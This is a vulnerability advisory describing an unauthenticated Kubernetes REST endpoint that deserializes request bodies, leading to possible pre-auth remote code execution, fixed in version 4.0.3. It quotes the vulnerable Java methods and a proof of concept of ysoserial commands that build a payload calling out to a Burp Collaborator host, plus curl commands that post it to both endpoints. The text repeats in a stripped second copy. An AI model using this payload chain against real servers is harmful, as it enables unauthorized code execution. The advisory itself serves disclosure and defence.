Impacts
A Kubernetes REST endpoint
exposes two methods that deserialize untrusted data from the request body:
@Path("/allocate-job-caches")
@Consumes(MediaType.APPLICATION_OCTET_STREAM)
@Produces(MediaType.APPLICATION_OCTET_STREAM)
@POST
public byte[] allocateJobCaches(byte[] cacheAllocationRequestBytes) {
CacheAllocationRequest allocationRequest = (CacheAllocationRequest) SerializationUtils.deserialize(cacheAllocationRequestBytes);
and
@Path("/report-job-caches")
@Consumes(MediaType.APPLICATION_OCTET_STREAM)
@POST
public void reportJobCaches(byte[] cacheInstanceBytes) {
@SuppressWarnings("unchecked")
Collection<CacheInstance> cacheInstances = (Collection<CacheInstance>) SerializationUtils
.deserialize(cacheInstanceBytes);
jobManager.reportJobCaches(getJobToken(), cacheInstances);
}
These endpoints do not enforce any authentication or authorization checks.
PoC
java -jar ~/Dev/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://pzs6r9v6ryn8go4gnk26o91xqowgk5.burpcollaborator.net > deser_payload.bin`
curl -H "Content-Type:application/octet-stream" --data-binary @deser_payload.bin http://localhost:6610/rest/k8s/allocate-job-caches
java -jar ~/Dev/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://pzs6r9v6ryn8go4gnk26o91xqowgk5.burpcollaborator.net > deser_payload.bin
curl -H "Content-Type:application/octet-stream" --data-binary @deser_payload.bin http://localhost:6610/rest/k8s/report-job-caches
This issue may lead to pre-auth RCE
Patches
This issue was fixed in 4.0.3 by not using deserialization at KubernetesResource side
Credits
This issue was discovered by @pwntester
Impacts
A
Kubernetes REST endpoint
exposes two methods that deserialize untrusted data from the request body:and
These endpoints do not enforce any authentication or authorization checks.
PoC
This issue may lead to
pre-auth RCE
Patches
This issue was fixed in 4.0.3 by not using deserialization at KubernetesResource side
Credits
This issue was discovered by @pwntester